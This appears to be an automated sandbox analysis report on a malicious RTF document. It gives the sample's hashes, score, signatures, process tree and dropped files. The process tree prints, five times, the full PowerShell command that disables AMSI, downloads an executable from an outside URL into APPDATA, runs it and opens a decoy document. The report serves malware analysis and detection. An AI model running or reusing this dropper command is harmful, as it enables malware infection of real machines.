Analysis

  • max time kernel
    122s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10/06/2024, 16:43

General

  • Target

    9b59006f4fcfe00a50a7d40aff1a09c3_JaffaCakes118.rtf

  • Size

    691KB

  • MD5

    9b59006f4fcfe00a50a7d40aff1a09c3

  • SHA1

    38a48704c91102831f2fa21982950a2f3682da50

  • SHA256

    b8cf0c0eb811ad88cb3210779047dc06e4ea32ba6cb48bbf14c15d6588821ade

  • SHA512

    e389d2efe565d2ade409c133f7f9821aac96c6e89ba181bbfe5057885ec0eb120d599957905b38872ab2dfccdb5fc7afbf20a8db545eac3cdebf177b6ccb81b9

  • SSDEEP

    3072:YkoI6HWpkoI6HWpkoI6HWpkoI6HWpkoI6HWA:Ydwdwdwdwd9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://lashawnbarber.com/images/files/okey.exe

exe.dropper

http://www.iiswc.org/iiswc2009/sample.doc

Signatures

  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9b59006f4fcfe00a50a7d40aff1a09c3_JaffaCakes118.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:2456
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); $file = $env:APPDATA + '\75U.exe';$nwPath = $env:APPDATA + '\YHR.doc';If (test-path $file) {Remove-Item $file} If (test-path $nwPath) {Remove-Item $nwPath} $coma = New-Object System.Net.WebClient; $coma.Headers['User-Agent'] = 'who-nop'; $coma.DownloadFile('http://lashawnbarber.com/images/files/okey.exe', $file); $coma.DownloadFile('http://www.iiswc.org/iiswc2009/sample.doc', $nwPath); (New-Object -com Shell.Application).ShellExecute($file); Stop-Process -processname WINWORD;Start-Process -FilePath $nwPath;Stop-Process -Id $Pid -Force
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2396
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); $file = $env:APPDATA + '\75U.exe';$nwPath = $env:APPDATA + '\YHR.doc';If (test-path $file) {Remove-Item $file} If (test-path $nwPath) {Remove-Item $nwPath} $coma = New-Object System.Net.WebClient; $coma.Headers['User-Agent'] = 'who-nop'; $coma.DownloadFile('http://lashawnbarber.com/images/files/okey.exe', $file); $coma.DownloadFile('http://www.iiswc.org/iiswc2009/sample.doc', $nwPath); (New-Object -com Shell.Application).ShellExecute($file); Stop-Process -processname WINWORD;Start-Process -FilePath $nwPath;Stop-Process -Id $Pid -Force
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\YHR.doc"
        3⤵
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          4⤵
            PID:2692
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); $file = $env:APPDATA + '\75U.exe';$nwPath = $env:APPDATA + '\YHR.doc';If (test-path $file) {Remove-Item $file} If (test-path $nwPath) {Remove-Item $nwPath} $coma = New-Object System.Net.WebClient; $coma.Headers['User-Agent'] = 'who-nop'; $coma.DownloadFile('http://lashawnbarber.com/images/files/okey.exe', $file); $coma.DownloadFile('http://www.iiswc.org/iiswc2009/sample.doc', $nwPath); (New-Object -com Shell.Application).ShellExecute($file); Stop-Process -processname WINWORD;Start-Process -FilePath $nwPath;Stop-Process -Id $Pid -Force
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1700
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); $file = $env:APPDATA + '\75U.exe';$nwPath = $env:APPDATA + '\YHR.doc';If (test-path $file) {Remove-Item $file} If (test-path $nwPath) {Remove-Item $nwPath} $coma = New-Object System.Net.WebClient; $coma.Headers['User-Agent'] = 'who-nop'; $coma.DownloadFile('http://lashawnbarber.com/images/files/okey.exe', $file); $coma.DownloadFile('http://www.iiswc.org/iiswc2009/sample.doc', $nwPath); (New-Object -com Shell.Application).ShellExecute($file); Stop-Process -processname WINWORD;Start-Process -FilePath $nwPath;Stop-Process -Id $Pid -Force
        2⤵
        • Process spawned unexpected child process
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2716
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); $file = $env:APPDATA + '\75U.exe';$nwPath = $env:APPDATA + '\YHR.doc';If (test-path $file) {Remove-Item $file} If (test-path $nwPath) {Remove-Item $nwPath} $coma = New-Object System.Net.WebClient; $coma.Headers['User-Agent'] = 'who-nop'; $coma.DownloadFile('http://lashawnbarber.com/images/files/okey.exe', $file); $coma.DownloadFile('http://www.iiswc.org/iiswc2009/sample.doc', $nwPath); (New-Object -com Shell.Application).ShellExecute($file); Stop-Process -processname WINWORD;Start-Process -FilePath $nwPath;Stop-Process -Id $Pid -Force
        2⤵
        • Process spawned unexpected child process
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\75U.exe

      Filesize

      114B

      MD5

      e89f75f918dbdcee28604d4e09dd71d7

      SHA1

      f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

      SHA256

      6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

      SHA512

      8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl

      Filesize

      36KB

      MD5

      4e1b899a12eaca603272710a091d49e0

      SHA1

      538057be97584d3dfcd92b69d85febbd00999629

      SHA256

      910fd606c6f7e95b1eee78c327e440b9cd15e445a40720e47a141b5f2773944e

      SHA512

      4afd62ef918e5d482088bff72857bd1df36d4b8390a22547b700b0e3f30f8d0ac795540d949cf483927de3404fe721763bf3d18cf538ed793c88ae33e448301f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      11128c7cca78f2328e76982246836be4

      SHA1

      1d3c68a42c96179946446eb1291e73a9dc026255

      SHA256

      46b191a5f8483655d95fafea857b46b8184b9c4c7c83a24126709e4a553cf257

      SHA512

      911c87951bdcdc912b830f027ad8f17654880425760a091ca388910e9b128db251ff2d4d8a2e8c3204b0aefa2db62d582af8059ddb49a72f2d5abb10c8d52371

    • memory/552-90-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-94-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-87-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-88-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-91-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-92-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-89-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-98-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-97-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-96-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-95-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/552-93-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/2456-0-0x000000002FF71000-0x000000002FF72000-memory.dmp

      Filesize

      4KB

    • memory/2456-109-0x00000000716FD000-0x0000000071708000-memory.dmp

      Filesize

      44KB

    • memory/2456-2-0x00000000716FD000-0x0000000071708000-memory.dmp

      Filesize

      44KB

    • memory/2456-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2520-24-0x0000000005AF0000-0x0000000005BF0000-memory.dmp

      Filesize

      1024KB

    • memory/2520-6-0x00000000716FD000-0x0000000071708000-memory.dmp

      Filesize

      44KB

    • memory/2520-26-0x00000000716FD000-0x0000000071708000-memory.dmp

      Filesize

      44KB

    • memory/2520-25-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2520-23-0x0000000005AF0000-0x0000000005BF0000-memory.dmp

      Filesize

      1024KB